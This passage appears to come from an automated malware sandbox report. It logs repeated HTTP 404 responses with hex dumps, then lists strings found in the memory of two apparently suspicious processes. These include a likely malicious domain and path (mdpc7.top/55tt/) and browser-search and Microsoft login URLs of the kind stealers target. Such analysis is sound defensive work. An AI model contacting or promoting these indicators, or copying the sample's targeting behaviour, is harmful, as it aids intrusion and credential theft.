45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:07 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:10 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:12 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 18 Nov 2024 12:14:26 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 2966 | Connection: close | Vary: Accept-Encoding | ETag: "66cce1df-b96"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 18 Nov 2024 12:14:33 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 18 Nov 2024 12:14:36 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 18 Nov 2024 12:14:38 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 18 Nov 2024 12:14:41 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Mon, 18 Nov 2024 12:14:48 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Mon, 18 Nov 2024 12:14:50 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Mon, 18 Nov 2024 12:14:53 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 162 | Content-Type: text/html;charset=utf-8 | Date: Mon, 18 Nov 2024 12:14:56 GMT | Server: nginx | X-Cache: BYPASS | Connection: close | Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mdpc7.top
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mdpc7.top/55tt/
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000004BA4000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003E74000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000043CA000.00000004.10000000.00040000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3138038480.0000000006420000.00000004.00000800.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.000000000369A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
